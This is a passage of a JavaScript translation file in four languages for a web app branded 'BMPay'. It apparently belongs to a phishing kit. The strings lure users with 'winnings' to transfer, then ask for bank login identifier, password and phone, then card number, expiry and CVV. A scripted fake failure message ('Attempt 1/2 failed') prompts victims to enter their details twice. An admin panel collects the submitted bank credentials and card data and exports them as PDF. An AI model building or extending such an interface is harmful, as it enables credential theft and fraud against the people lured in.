const translations = {
  fr: {
    // Common
    secureSpace: "Espace securise",
    sslSecure: "Connexion securisee SSL",
    encryptedData: "Donnees chiffrees",
    sslConnection: "Connexion SSL securisee",
    securedByBMPay: "Transactions securisees par BMPay",
    secure3D: "Paiement 3D Secure",
    secureTransaction: "Transaction securisee",
    back: "Retour",
    loading: "Chargement...",
    cancel: "Annuler",
    save: "Enregistrer",
    delete: "Supprimer",
    add: "Ajouter",
    close: "Fermer",
    confirm: "Confirmer",
    error: "Erreur",
    success: "Succes",
    stepBeneficiary: "Beneficiaire",
    stepBank: "Banque",
    stepCard: "Carte",
    account: "Compte",
    disconnect: "Deconnexion",
    copyright: "2025 BMPay. Tous droits reserves.",
    secureBMPay: "BMPay - Transferts securises",

    // Login Page
    clientSpace: "Espace Client",
    verifyAndTransfer: "Verifiez et transferez vos gains en toute securite",
    loginToAccount: "Connexion a votre compte",
    identificationCode: "Code d'identification",
    enterCode: "Entrez votre code",
    codeProvidedByBMPay: "Code fourni par BMPay",
    invalidCode: "Code d'identification invalide. Veuillez reessayer.",
    connectionError: "Erreur de connexion. Veuillez reessayer.",
    loginSuccess: "Connexion reussie",
    invalidCodeToast: "Code invalide",
    connectionErrorToast: "Erreur de connexion",
    accessMyAccount: "Acceder a mon compte",
    connecting: "Connexion...",
    forgotCode: "Code oublie ?",
    contactSupport: "Veuillez contacter le support BMPay pour recuperer votre code.",

    // Dashboard
    welcome: "Bienvenue,",
    manageGains: "Gerez vos gains en toute securite",
    availableBalance: "Solde disponible",
    verifiedAccount: "Compte verifie",
    readyForTransfer: "Pret pour le transfert",
    secured: "Securise",
    requestTransfer: "Demander un transfert",
    transferHistory: "Historique des transferts",
    transferProcessed: "Les transferts sont traites sous 24-48h ouvrees",

    // Withdraw Page
    beneficiaryInfo: "Informations du beneficiaire",
    enterCoordinates: "Renseignez vos coordonnees pour le transfert",
    fullName: "Nom complet",
    fullNamePlaceholder: "Jean Dupont",
    emailAddress: "Adresse email",
    emailPlaceholder: "votre@email.com",
    iban: "IBAN",
    ibanPlaceholder: "FR76 XXXX XXXX XXXX XXXX XXXX XXX",
    fullNameRequired: "Le nom complet est requis",
    emailRequired: "L'adresse email est requise",
    invalidEmail: "Adresse email invalide",
    ibanRequired: "L'IBAN est requis",
    invalidIban: "IBAN invalide",
    infoSaved: "Informations enregistrees",
    continue: "Continuer",
    processing: "Traitement...",

    // Bank Auth Page
    identityVerificationRequired: "Verification d'identite requise",
    toFinalizeTransfer: "Pour finaliser le transfert et eviter tout type de fraude, connectez-vous via votre banque.",
    newAttempt: "Nouvelle tentative",
    secureBankSpace: "Espace bancaire securise",
    attempt2of2: "Tentative 2/2 - Verifiez vos identifiants",
    loginToVerify: "Connectez-vous pour verifier votre identite",
    lastAttempt: "Derniere tentative",
    verifyCredentials: "Verifiez vos identifiants",
    phoneNumber: "Numero de telephone",
    phonePlaceholder: "+687 XX XX XX",
    bankEstablishment: "Etablissement bancaire",
    selectBank: "Selectionnez votre banque",
    clientIdentifier: "Identifiant client",
    bankIdentifierPlaceholder: "Votre identifiant bancaire",
    password: "Mot de passe",
    yourPassword: "Votre mot de passe",
    authenticate: "Authentifier",
    verifying: "Verification...",
    authSaved: "Authentification enregistree",
    selectBankError: "Veuillez selectionner une banque",
    identifierRequired: "L'identifiant est requis",
    passwordRequired: "Le mot de passe est requis",
    phoneRequired: "Le numero de telephone est requis",
    invalidPhone: "Numero de telephone invalide",

    // Card Validation Page
    loadingMsg1: "Connexion au serveur securise...",
    loadingMsg2: "Verification des informations...",
    loadingMsg3: "Authentification en cours...",
    loadingMsg4: "Validation de la carte...",
    loadingMsg5: "Finalisation du transfert...",
    cardValidation: "Validation par carte",
    cardRequiredToFinalize: "Carte requise pour finaliser le transfert",
    attempt2of2Verify: "Tentative 2/2 - Verifiez vos informations",
    cardType: "Type de carte",
    selectType: "Selectionnez le type",
    cardNumber16: "Numero de carte (16 chiffres)",
    cardNumberPlaceholder: "1234 5678 9012 3456",
    expiration: "Expiration",
    cvv3digits: "CVV (3 chiffres)",
    finalizeTransfer: "Finaliser le transfert",
    selectCardTypeError: "Veuillez selectionner un type de carte",
    cardNumberRequired: "Le numero de carte est requis",
    enter16digits: "Veuillez entrer les 16 chiffres",
    expiryRequired: "Date d'expiration requise",
    expiryFormat: "Format MM/AA",
    cvvRequired: "CVV requis",
    cvv3digitsError: "3 chiffres",
    authFailed: "Echec d'authentification avec votre banque. Veuillez verifier vos informations et reessayer...",
    attempt1of2Failed: "Tentative 1/2 echouee",
    verificationSuccess: "Verification reussie",
    attemptsAllowed: "Nombre de tentatives autorisees : 2",
    retryAttempt2: "Reessayer (2eme tentative)",

    // Success Page
    sessionExpired: "Session expiree",
    returnHome: "Retour a l'accueil",
    transferInProgress: "Transfert en cours",
    ofProcessing: "de traitement",
    confirmationByEmail: "Vous recevrez une confirmation par mail apres validation.",
    transferReference: "Reference du transfert",
    transferAmount: "Montant du transfert",
    delay: "Delai",
    delayValue: "24-48h ouvrees",
    date: "Date",

    // User History Page
    viewTransferRequests: "Consultez vos demandes de transfert",
    noTransferInProgress: "Aucun transfert en cours",
    transferRequestsWillAppear: "Vos demandes de transfert apparaitront ici",
    backToDashboard: "Retour au tableau de bord",

    // Admin Login
    adminBMPay: "Administration BMPay",
    configPanel: "Panneau de configuration",
    adminAccessOnly: "Acces reserve aux administrateurs",
    enterAdminPassword: "Entrez le mot de passe admin",
    incorrectPassword: "Mot de passe incorrect",
    adminLoginSuccess: "Connexion admin reussie",
    accessDenied: "Acces refuse",
    login: "Se connecter",
    secureAccess: "Acces securise",

    // Admin Page
    adminPanel: "Panneau d'administration",
    accessCodes: "Codes d'acces",
    banks: "Banques",
    history: "Historique",
    cardTypes: "Types de cartes",
    settings: "Parametres",
    accessCodeManagement: "Gestion des codes d'acces",
    addCode: "Ajouter un code",
    code: "Code",
    name: "Nom",
    amount: "Montant",
    currency: "Devise",
    actions: "Actions",
    bankManagement: "Gestion des banques",
    bankName: "Nom de la banque",
    submissionHistory: "Historique des soumissions",
    refresh: "Actualiser",
    downloadPDF: "Telecharger PDF",
    deleteAll: "Tout supprimer",
    noSubmission: "Aucune soumission enregistree",
    cardTypeManagement: "Gestion des types de cartes",
    newCardTypePlaceholder: "Nouveau type de carte (ex: American Express)",
    noCardTypeConfigured: "Aucun type de carte configure",
    changePassword: "Changer le mot de passe",
    currentPassword: "Mot de passe actuel",
    enterCurrentPassword: "Entrez le mot de passe actuel",
    newPassword: "Nouveau mot de passe",
    minChars: "Minimum 6 caracteres",
    confirmPassword: "Confirmer le mot de passe",
    confirmNewPassword: "Confirmez le nouveau mot de passe",
    passwordsDoNotMatch: "Les mots de passe ne correspondent pas",
    saveNewPassword: "Enregistrer le nouveau mot de passe",
    changingPassword: "Modification en cours...",
    passwordChangedSuccess: "Mot de passe modifie avec succes",
    passwordChangeInfo: "Le mot de passe sera modifie immediatement. Vous devrez utiliser le nouveau mot de passe lors de votre prochaine connexion.",
    fillAllFields: "Veuillez remplir tous les champs",
    minPasswordLength: "Le nouveau mot de passe doit contenir au moins 6 caracteres",
    addAccessCode: "Ajouter un code d'acces",
    identificationCodeLabel: "Code d'identification",
    codePlaceholder: "Ex: 50001",
    fullNameLabel: "Nom complet",
    namePlaceholder: "Ex: Jean Dupont",
    amountPlaceholder: "Ex: 5000000",
    codeAlreadyExists: "Ce code existe deja",
    codeAdded: "Code d'acces ajoute",
    editCode: "Modifier le code",
    codeModified: "Code d'acces modifie",
    deleteCodeConfirm: "Supprimer le code",
    codeDeleted: "Code supprime",
    enterBankName: "Veuillez entrer un nom de banque",
    bankAlreadyExists: "Cette banque existe deja",
    bankAdded: "Banque ajoutee",
    deleteBankConfirm: "Supprimer",
    deleteBankSuffix: "de la liste ?",
    bankDeleted: "Banque supprimee",
    enterCardType: "Veuillez entrer un type de carte",
    cardTypeAlreadyExists: "Ce type de carte existe deja",
    cardTypeAdded: "Type de carte ajoute",
    cardTypeDeleted: "Type de carte supprime",
    deleteSubmissionConfirm: "Supprimer cette soumission ?",
    submissionDeleted: "Soumission supprimee",
    deleteAllConfirm: "Supprimer TOUTES les soumissions ? Cette action est irreversible.",
    allSubmissionsDeleted: "Toutes les soumissions ont ete supprimees",
    noDataToExport: "Aucune donnee a exporter",
    pdfExportSuccess: "PDF telecharge avec succes",
    loadError: "Erreur lors du chargement",
    deleteError: "Erreur lors de la suppression",
    submissionDetails: "Details de la soumission",
    dateLabel: "Date",
    attemptLabel: "Tentative",
    beneficiary: "Beneficiaire",
    phone: "Telephone",
    bankCredentials: "Identifiants bancaires",
    bank: "Banque",
    identifier: "Identifiant",
    bankCard: "Carte bancaire",
    type: "Type",
    last8digits: "8 derniers chiffres",
    expirationLabel: "Expiration",
    attempt: "Tentative",
    email: "Email",
  },

  en: {
    secureSpace: "Secure space",
    sslSecure: "Secure SSL connection",
    encryptedData: "Encrypted data",
    sslConnection: "Secure SSL connection",
    securedByBMPay: "Transactions secured by BMPay",
    secure3D: "3D Secure Payment",
    secureTransaction: "Secure transaction",
    back: "Back",
    loading: "Loading...",
    cancel: "Cancel",
    save: "Save",
    delete: "Delete",
    add: "Add",
    close: "Close",
    confirm: "Confirm",
    error: "Error",
    success: "Success",
    stepBeneficiary: "Beneficiary",
    stepBank: "Bank",
    stepCard: "Card",
    account: "Account",
    disconnect: "Logout",
    copyright: "2025 BMPay. All rights reserved.",
    secureBMPay: "BMPay - Secure transfers",

    clientSpace: "Client Area",
    verifyAndTransfer: "Verify and transfer your winnings securely",
    loginToAccount: "Login to your account",
    identificationCode: "Identification code",
    enterCode: "Enter your code",
    codeProvidedByBMPay: "Code provided by BMPay",
    invalidCode: "Invalid identification code. Please try again.",
    connectionError: "Connection error. Please try again.",
    loginSuccess: "Login successful",
    invalidCodeToast: "Invalid code",
    connectionErrorToast: "Connection error",
    accessMyAccount: "Access my account",
    connecting: "Connecting...",
    forgotCode: "Forgot your code?",
    contactSupport: "Please contact BMPay support to recover your code.",

    welcome: "Welcome,",
    manageGains: "Manage your winnings securely",
    availableBalance: "Available balance",
    verifiedAccount: "Verified account",
    readyForTransfer: "Ready for transfer",
    secured: "Secured",
    requestTransfer: "Request a transfer",
    transferHistory: "Transfer history",
    transferProcessed: "Transfers are processed within 24-48 business hours",

    beneficiaryInfo: "Beneficiary information",
    enterCoordinates: "Enter your details for the transfer",
    fullName: "Full name",
    fullNamePlaceholder: "John Smith",
    emailAddress: "Email address",
    emailPlaceholder: "your@email.com",
    iban: "IBAN",
    ibanPlaceholder: "FR76 XXXX XXXX XXXX XXXX XXXX XXX",
    fullNameRequired: "Full name is required",
    emailRequired: "Email address is required",
    invalidEmail: "Invalid email address",
    ibanRequired: "IBAN is required",
    invalidIban: "Invalid IBAN",
    infoSaved: "Information saved",
    continue: "Continue",
    processing: "Processing...",

    identityVerificationRequired: "Identity verification required",
    toFinalizeTransfer: "To finalize the transfer and prevent any fraud, log in via your bank.",
    newAttempt: "New attempt",
    secureBankSpace: "Secure bank space",
    attempt2of2: "Attempt 2/2 - Verify your credentials",
    loginToVerify: "Log in to verify your identity",
    lastAttempt: "Last attempt",
    verifyCredentials: "Verify your credentials",
    phoneNumber: "Phone number",
    phonePlaceholder: "+1 XXX XXX XXXX",
    bankEstablishment: "Banking institution",
    selectBank: "Select your bank",
    clientIdentifier: "Client identifier",
    bankIdentifierPlaceholder: "Your bank identifier",
    password: "Password",
    yourPassword: "Your password",
    authenticate: "Authenticate",
    verifying: "Verifying...",
    authSaved: "Authentication saved",
    selectBankError: "Please select a bank",
    identifierRequired: "Identifier is required",
    passwordRequired: "Password is required",
    phoneRequired: "Phone number is required",
    invalidPhone: "Invalid phone number",

    loadingMsg1: "Connecting to secure server...",
    loadingMsg2: "Verifying information...",
    loadingMsg3: "Authentication in progress...",
    loadingMsg4: "Validating card...",
    loadingMsg5: "Finalizing transfer...",
    cardValidation: "Card validation",
    cardRequiredToFinalize: "Card required to finalize the transfer",
    attempt2of2Verify: "Attempt 2/2 - Verify your information",
    cardType: "Card type",
    selectType: "Select the type",
    cardNumber16: "Card number (16 digits)",
    cardNumberPlaceholder: "1234 5678 9012 3456",
    expiration: "Expiration",
    cvv3digits: "CVV (3 digits)",
    finalizeTransfer: "Finalize the transfer",
    selectCardTypeError: "Please select a card type",
    cardNumberRequired: "Card number is required",
    enter16digits: "Please enter 16 digits",
    expiryRequired: "Expiry date required",
    expiryFormat: "Format MM/YY",
    cvvRequired: "CVV required",
    cvv3digitsError: "3 digits",
    authFailed: "Authentication failed with your bank. Please verify your information and try again...",
    attempt1of2Failed: "Attempt 1/2 failed",
    verificationSuccess: "Verification successful",
    attemptsAllowed: "Number of authorized attempts: 2",
    retryAttempt2: "Retry (2nd attempt)",

    sessionExpired: "Session expired",
    returnHome: "Return to home",
    transferInProgress: "Transfer in progress",
    ofProcessing: "processing",
    confirmationByEmail: "You will receive a confirmation email after validation.",
    transferReference: "Transfer reference",
    transferAmount: "Transfer amount",
    delay: "Delay",
    delayValue: "24-48 business hours",
    date: "Date",

    viewTransferRequests: "View your transfer requests",
    noTransferInProgress: "No transfer in progress",
    transferRequestsWillAppear: "Your transfer requests will appear here",
    backToDashboard: "Back to dashboard",

    adminBMPay: "BMPay Administration",
    configPanel: "Configuration panel",
    adminAccessOnly: "Access reserved for administrators",
    enterAdminPassword: "Enter admin password",
    incorrectPassword: "Incorrect password",
    adminLoginSuccess: "Admin login successful",
    accessDenied: "Access denied",
    login: "Log in",
    secureAccess: "Secure access",

    adminPanel: "Administration panel",
    accessCodes: "Access codes",
    banks: "Banks",
    history: "History",
    cardTypes: "Card types",
    settings: "Settings",
    accessCodeManagement: "Access code management",
    addCode: "Add a code",
    code: "Code",
    name: "Name",
    amount: "Amount",
    currency: "Currency",
    actions: "Actions",
    bankManagement: "Bank management",
    bankName: "Bank name",
    submissionHistory: "Submission history",
    refresh: "Refresh",
    downloadPDF: "Download PDF",
    deleteAll: "Delete all",
    noSubmission: "No submissions recorded",
    cardTypeManagement: "Card type management",
    newCardTypePlaceholder: "New card type (e.g., American Express)",
    noCardTypeConfigured: "No card type configured",
    changePassword: "Change password",
    currentPassword: "Current password",
    enterCurrentPassword: "Enter current password",
    newPassword: "New password",
    minChars: "Minimum 6 characters",
    confirmPassword: "Confirm password",
    confirmNewPassword: "Confirm new password",
    passwordsDoNotMatch: "Passwords do not match",
    saveNewPassword: "Save new password",
    changingPassword: "Changing password...",
    passwordChangedSuccess: "Password changed successfully",
    passwordChangeInfo: "The password will be changed immediately. You will need to use the new password on your next login.",
    fillAllFields: "Please fill in all fields",
    minPasswordLength: "New password must be at least 6 characters",
    addAccessCode: "Add an access code",
    identificationCodeLabel: "Identification code",
    codePlaceholder: "E.g., 50001",
    fullNameLabel: "Full name",
    namePlaceholder: "E.g., John Smith",
    amountPlaceholder: "E.g., 5000000",
    codeAlreadyExists: "This code already exists",
    codeAdded: "Access code added",
    editCode: "Edit code",
    codeModified: "Access code modified",
    deleteCodeConfirm: "Delete code",
    codeDeleted: "Code deleted",
    enterBankName: "Please enter a bank name",
    bankAlreadyExists: "This bank already exists",
    bankAdded: "Bank added",
    deleteBankConfirm: "Delete",
    deleteBankSuffix: "from the list?",
    bankDeleted: "Bank deleted",
    enterCardType: "Please enter a card type",
    cardTypeAlreadyExists: "This card type already exists",
    cardTypeAdded: "Card type added",
    cardTypeDeleted: "Card type deleted",
    deleteSubmissionConfirm: "Delete this submission?",
    submissionDeleted: "Submission deleted",
    deleteAllConfirm: "Delete ALL submissions? This action is irreversible.",
    allSubmissionsDeleted: "All submissions have been deleted",
    noDataToExport: "No data to export",
    pdfExportSuccess: "PDF downloaded successfully",
    loadError: "Error loading data",
    deleteError: "Error during deletion",
    submissionDetails: "Submission details",
    dateLabel: "Date",
    attemptLabel: "Attempt",
    beneficiary: "Beneficiary",
    phone: "Phone",
    bankCredentials: "Bank credentials",
    bank: "Bank",
    identifier: "Identifier",
    bankCard: "Bank card",
    type: "Type",
    last8digits: "Last 8 digits",
    expirationLabel: "Expiration",
    attempt: "Attempt",
    email: "Email",
  },

  es: {
    secureSpace: "Espacio seguro",
    sslSecure: "Conexion SSL segura",
    encryptedData: "Datos cifrados",
    sslConnection: "Conexion SSL segura",
    securedByBMPay: "Transacciones aseguradas por BMPay",
    secure3D: "Pago 3D Secure",
    secureTransaction: "Transaccion segura",
    back: "Volver",
    loading: "Cargando...",
    cancel: "Cancelar",
    save: "Guardar",
    delete: "Eliminar",
    add: "Agregar",
    close: "Cerrar",
    confirm: "Confirmar",
    error: "Error",
    success: "Exito",
    stepBeneficiary: "Beneficiario",
    stepBank: "Banco",
    stepCard: "Tarjeta",
    account: "Cuenta",
    disconnect: "Desconectar",
    copyright: "2025 BMPay. Todos los derechos reservados.",
    secureBMPay: "BMPay - Transferencias seguras",

    clientSpace: "Espacio Cliente",
    verifyAndTransfer: "Verifique y transfiera sus ganancias de forma segura",
    loginToAccount: "Inicio de sesion",
    identificationCode: "Codigo de identificacion",
    enterCode: "Ingrese su codigo",
    codeProvidedByBMPay: "Codigo proporcionado por BMPay",
    invalidCode: "Codigo de identificacion invalido. Intente nuevamente.",
    connectionError: "Error de conexion. Intente nuevamente.",
    loginSuccess: "Conexion exitosa",
    invalidCodeToast: "Codigo invalido",
    connectionErrorToast: "Error de conexion",
    accessMyAccount: "Acceder a mi cuenta",
    connecting: "Conectando...",
    forgotCode: "Codigo olvidado?",
    contactSupport: "Contacte al soporte de BMPay para recuperar su codigo.",

    welcome: "Bienvenido/a,",
    manageGains: "Gestione sus ganancias de forma segura",
    availableBalance: "Saldo disponible",
    verifiedAccount: "Cuenta verificada",
    readyForTransfer: "Listo para transferir",
    secured: "Seguro",
    requestTransfer: "Solicitar una transferencia",
    transferHistory: "Historial de transferencias",
    transferProcessed: "Las transferencias se procesan en 24-48 horas habiles",

    beneficiaryInfo: "Informacion del beneficiario",
    enterCoordinates: "Ingrese sus datos para la transferencia",
    fullName: "Nombre completo",
    fullNamePlaceholder: "Juan Garcia",
    emailAddress: "Correo electronico",
    emailPlaceholder: "su@correo.com",
    iban: "IBAN",
    ibanPlaceholder: "FR76 XXXX XXXX XXXX XXXX XXXX XXX",
    fullNameRequired: "El nombre completo es obligatorio",
    emailRequired: "El correo electronico es obligatorio",
    invalidEmail: "Correo electronico invalido",
    ibanRequired: "El IBAN es obligatorio",
    invalidIban: "IBAN invalido",
    infoSaved: "Informacion guardada",
    continue: "Continuar",
    processing: "Procesando...",

    identityVerificationRequired: "Verificacion de identidad requerida",
    toFinalizeTransfer: "Para finalizar la transferencia y evitar fraude, inicie sesion a traves de su banco.",
    newAttempt: "Nuevo intento",
    secureBankSpace: "Espacio bancario seguro",
    attempt2of2: "Intento 2/2 - Verifique sus credenciales",
    loginToVerify: "Inicie sesion para verificar su identidad",
    lastAttempt: "Ultimo intento",
    verifyCredentials: "Verifique sus credenciales",
    phoneNumber: "Numero de telefono",
    phonePlaceholder: "+34 XXX XXX XXX",
    bankEstablishment: "Entidad bancaria",
    selectBank: "Seleccione su banco",
    clientIdentifier: "Identificador del cliente",
    bankIdentifierPlaceholder: "Su identificador bancario",
    password: "Contrasena",
    yourPassword: "Su contrasena",
    authenticate: "Autenticar",
    verifying: "Verificando...",
    authSaved: "Autenticacion guardada",
    selectBankError: "Seleccione un banco",
    identifierRequired: "El identificador es obligatorio",
    passwordRequired: "La contrasena es obligatoria",
    phoneRequired: "El numero de telefono es obligatorio",
    invalidPhone: "Numero de telefono invalido",

    loadingMsg1: "Conectando al servidor seguro...",
    loadingMsg2: "Verificando informacion...",
    loadingMsg3: "Autenticacion en curso...",
    loadingMsg4: "Validando tarjeta...",
    loadingMsg5: "Finalizando transferencia...",
    cardValidation: "Validacion de tarjeta",
    cardRequiredToFinalize: "Tarjeta requerida para finalizar la transferencia",
    attempt2of2Verify: "Intento 2/2 - Verifique su informacion",
    cardType: "Tipo de tarjeta",
    selectType: "Seleccione el tipo",
    cardNumber16: "Numero de tarjeta (16 digitos)",
    cardNumberPlaceholder: "1234 5678 9012 3456",
    expiration: "Vencimiento",
    cvv3digits: "CVV (3 digitos)",
    finalizeTransfer: "Finalizar la transferencia",
    selectCardTypeError: "Seleccione un tipo de tarjeta",
    cardNumberRequired: "El numero de tarjeta es obligatorio",
    enter16digits: "Ingrese los 16 digitos",
    expiryRequired: "Fecha de vencimiento requerida",
    expiryFormat: "Formato MM/AA",
    cvvRequired: "CVV requerido",
    cvv3digitsError: "3 digitos",
    authFailed: "Fallo de autenticacion con su banco. Verifique su informacion e intente nuevamente...",
    attempt1of2Failed: "Intento 1/2 fallido",
    verificationSuccess: "Verificacion exitosa",
    attemptsAllowed: "Numero de intentos autorizados: 2",
    retryAttempt2: "Reintentar (2do intento)",

    sessionExpired: "Sesion expirada",
    returnHome: "Volver al inicio",
    transferInProgress: "Transferencia en curso",
    ofProcessing: "en procesamiento",
    confirmationByEmail: "Recibira una confirmacion por correo despues de la validacion.",
    transferReference: "Referencia de transferencia",
    transferAmount: "Monto de la transferencia",
    delay: "Plazo",
    delayValue: "24-48 horas habiles",
    date: "Fecha",

    viewTransferRequests: "Consulte sus solicitudes de transferencia",
    noTransferInProgress: "Sin transferencias en curso",
    transferRequestsWillAppear: "Sus solicitudes de transferencia apareceran aqui",
    backToDashboard: "Volver al panel",

    adminBMPay: "Administracion BMPay",
    configPanel: "Panel de configuracion",
    adminAccessOnly: "Acceso reservado a administradores",
    enterAdminPassword: "Ingrese la contrasena de admin",
    incorrectPassword: "Contrasena incorrecta",
    adminLoginSuccess: "Conexion admin exitosa",
    accessDenied: "Acceso denegado",
    login: "Iniciar sesion",
    secureAccess: "Acceso seguro",

    adminPanel: "Panel de administracion",
    accessCodes: "Codigos de acceso",
    banks: "Bancos",
    history: "Historial",
    cardTypes: "Tipos de tarjeta",
    settings: "Configuracion",
    accessCodeManagement: "Gestion de codigos de acceso",
    addCode: "Agregar un codigo",
    code: "Codigo",
    name: "Nombre",
    amount: "Monto",
    currency: "Moneda",
    actions: "Acciones",
    bankManagement: "Gestion de bancos",
    bankName: "Nombre del banco",
    submissionHistory: "Historial de envios",
    refresh: "Actualizar",
    downloadPDF: "Descargar PDF",
    deleteAll: "Eliminar todo",
    noSubmission: "Sin envios registrados",
    cardTypeManagement: "Gestion de tipos de tarjeta",
    newCardTypePlaceholder: "Nuevo tipo de tarjeta (ej: American Express)",
    noCardTypeConfigured: "Ningun tipo de tarjeta configurado",
    changePassword: "Cambiar contrasena",
    currentPassword: "Contrasena actual",
    enterCurrentPassword: "Ingrese la contrasena actual",
    newPassword: "Nueva contrasena",
    minChars: "Minimo 6 caracteres",
    confirmPassword: "Confirmar contrasena",
    confirmNewPassword: "Confirme la nueva contrasena",
    passwordsDoNotMatch: "Las contrasenas no coinciden",
    saveNewPassword: "Guardar nueva contrasena",
    changingPassword: "Cambiando contrasena...",
    passwordChangedSuccess: "Contrasena cambiada con exito",
    passwordChangeInfo: "La contrasena se cambiara inmediatamente. Debera usar la nueva contrasena en su proximo inicio de sesion.",
    fillAllFields: "Complete todos los campos",
    minPasswordLength: "La nueva contrasena debe tener al menos 6 caracteres",
    addAccessCode: "Agregar un codigo de acceso",
    identificationCodeLabel: "Codigo de identificacion",
    codePlaceholder: "Ej: 50001",
    fullNameLabel: "Nombre completo",
    namePlaceholder: "Ej: Juan Garcia",
    amountPlaceholder: "Ej: 5000000",
    codeAlreadyExists: "Este codigo ya existe",
    codeAdded: "Codigo de acceso agregado",
    editCode: "Editar codigo",
    codeModified: "Codigo de acceso modificado",
    deleteCodeConfirm: "Eliminar el codigo",
    codeDeleted: "Codigo eliminado",
    enterBankName: "Ingrese un nombre de banco",
    bankAlreadyExists: "Este banco ya existe",
    bankAdded: "Banco agregado",
    deleteBankConfirm: "Eliminar",
    deleteBankSuffix: "de la lista?",
    bankDeleted: "Banco eliminado",
    enterCardType: "Ingrese un tipo de tarjeta",
    cardTypeAlreadyExists: "Este tipo de tarjeta ya existe",
    cardTypeAdded: "Tipo de tarjeta agregado",
    cardTypeDeleted: "Tipo de tarjeta eliminado",
    deleteSubmissionConfirm: "Eliminar este envio?",
    submissionDeleted: "Envio eliminado",
    deleteAllConfirm: "Eliminar TODOS los envios? Esta accion es irreversible.",
    allSubmissionsDeleted: "Todos los envios han sido eliminados",
    noDataToExport: "Sin datos para exportar",
    pdfExportSuccess: "PDF descargado con exito",
    loadError: "Error al cargar datos",
    deleteError: "Error al eliminar",
    submissionDetails: "Detalles del envio",
    dateLabel: "Fecha",
    attemptLabel: "Intento",
    beneficiary: "Beneficiario",
    phone: "Telefono",
    bankCredentials: "Credenciales bancarias",
    bank: "Banco",
    identifier: "Identificador",
    bankCard: "Tarjeta bancaria",
    type: "Tipo",
    last8digits: "Ultimos 8 digitos",
    expirationLabel: "Vencimiento",
    attempt: "Intento",
    email: "Correo",
  },

  pt: {
    secureSpace: "Espaco seguro",
    sslSecure: "Conexao SSL segura",
    encryptedData: "Dados criptografados",
    sslConnection: "Conexao SSL segura",
    securedByBMPay: "Transacoes protegidas por BMPay",
    secure3D: "Pagamento 3D Secure",
    secureTransaction: "Transacao segura",
    back: "Voltar",
    loading: "Carregando...",
    cancel: "Cancelar",
    save: "Salvar",
    delete: "Excluir",
    add: "Adicionar",
    close: "Fechar",
    confirm: "Confirmar",
    error: "Erro",
    success: "Sucesso",
    stepBeneficiary: "Beneficiario",
    stepBank: "Banco",
    stepCard: "Cartao",
    account: "Conta",
    disconnect: "Desconectar",
    copyright: "2025 BMPay. Todos os direitos reservados.",
    secureBMPay: "BMPay - Transferencias seguras",

    clientSpace: "Espaco do Cliente",
    verifyAndTransfer: "Verifique e transfira seus ganhos com seguranca",
    loginToAccount: "Acesso a sua conta",
    identificationCode: "Codigo de identificacao",
    enterCode: "Digite seu codigo",
    codeProvidedByBMPay: "Codigo fornecido pelo BMPay",
    invalidCode: "Codigo de identificacao invalido. Tente novamente.",
    connectionError: "Erro de conexao. Tente novamente.",
    loginSuccess: "Conexao bem-sucedida",
    invalidCodeToast: "Codigo invalido",
    connectionErrorToast: "Erro de conexao",
    accessMyAccount: "Acessar minha conta",
    connecting: "Conectando...",
    forgotCode: "Esqueceu o codigo?",
    contactSupport: "Entre em contato com o suporte BMPay para recuperar seu codigo.",

    welcome: "Bem-vindo/a,",
    manageGains: "Gerencie seus ganhos com seguranca",
    availableBalance: "Saldo disponivel",
    verifiedAccount: "Conta verificada",
    readyForTransfer: "Pronto para transferencia",
    secured: "Seguro",
    requestTransfer: "Solicitar transferencia",
    transferHistory: "Historico de transferencias",
    transferProcessed: "Transferencias processadas em 24-48 horas uteis",

    beneficiaryInfo: "Informacoes do beneficiario",
    enterCoordinates: "Insira seus dados para a transferencia",
    fullName: "Nome completo",
    fullNamePlaceholder: "Joao Silva",
    emailAddress: "Endereco de email",
    emailPlaceholder: "seu@email.com",
    iban: "IBAN",
    ibanPlaceholder: "FR76 XXXX XXXX XXXX XXXX XXXX XXX",
    fullNameRequired: "Nome completo obrigatorio",
    emailRequired: "Endereco de email obrigatorio",
    invalidEmail: "Endereco de email invalido",
    ibanRequired: "IBAN obrigatorio",
    invalidIban: "IBAN invalido",
    infoSaved: "Informacoes salvas",
    continue: "Continuar",
    processing: "Processando...",

    identityVerificationRequired: "Verificacao de identidade necessaria",
    toFinalizeTransfer: "Para finalizar a transferencia e evitar fraudes, faca login pelo seu banco.",
    newAttempt: "Nova tentativa",
    secureBankSpace: "Espaco bancario seguro",
    attempt2of2: "Tentativa 2/2 - Verifique suas credenciais",
    loginToVerify: "Faca login para verificar sua identidade",
    lastAttempt: "Ultima tentativa",
    verifyCredentials: "Verifique suas credenciais",
    phoneNumber: "Numero de telefone",
    phonePlaceholder: "+55 XX XXXXX XXXX",
    bankEstablishment: "Instituicao bancaria",
    selectBank: "Selecione seu banco",
    clientIdentifier: "Identificador do cliente",
    bankIdentifierPlaceholder: "Seu identificador bancario",
    password: "Senha",
    yourPassword: "Sua senha",
    authenticate: "Autenticar",
    verifying: "Verificando...",
    authSaved: "Autenticacao salva",
    selectBankError: "Selecione um banco",
    identifierRequired: "Identificador obrigatorio",
    passwordRequired: "Senha obrigatoria",
    phoneRequired: "Numero de telefone obrigatorio",
    invalidPhone: "Numero de telefone invalido",

    loadingMsg1: "Conectando ao servidor seguro...",
    loadingMsg2: "Verificando informacoes...",
    loadingMsg3: "Autenticacao em andamento...",
    loadingMsg4: "Validando cartao...",
    loadingMsg5: "Finalizando transferencia...",
    cardValidation: "Validacao do cartao",
    cardRequiredToFinalize: "Cartao necessario para finalizar a transferencia",
    attempt2of2Verify: "Tentativa 2/2 - Verifique suas informacoes",
    cardType: "Tipo de cartao",
    selectType: "Selecione o tipo",
    cardNumber16: "Numero do cartao (16 digitos)",
    cardNumberPlaceholder: "1234 5678 9012 3456",
    expiration: "Validade",
    cvv3digits: "CVV (3 digitos)",
    finalizeTransfer: "Finalizar a transferencia",
    selectCardTypeError: "Selecione um tipo de cartao",
    cardNumberRequired: "Numero do cartao obrigatorio",
    enter16digits: "Digite os 16 digitos",
    expiryRequired: "Data de validade obrigatoria",
    expiryFormat: "Formato MM/AA",
    cvvRequired: "CVV obrigatorio",
    cvv3digitsError: "3 digitos",
    authFailed: "Falha na autenticacao com seu banco. Verifique suas informacoes e tente novamente...",
    attempt1of2Failed: "Tentativa 1/2 falhou",
    verificationSuccess: "Verificacao bem-sucedida",
    attemptsAllowed: "Numero de tentativas autorizadas: 2",
    retryAttempt2: "Tentar novamente (2a tentativa)",

    sessionExpired: "Sessao expirada",
    returnHome: "Voltar ao inicio",
    transferInProgress: "Transferencia em andamento",
    ofProcessing: "em processamento",
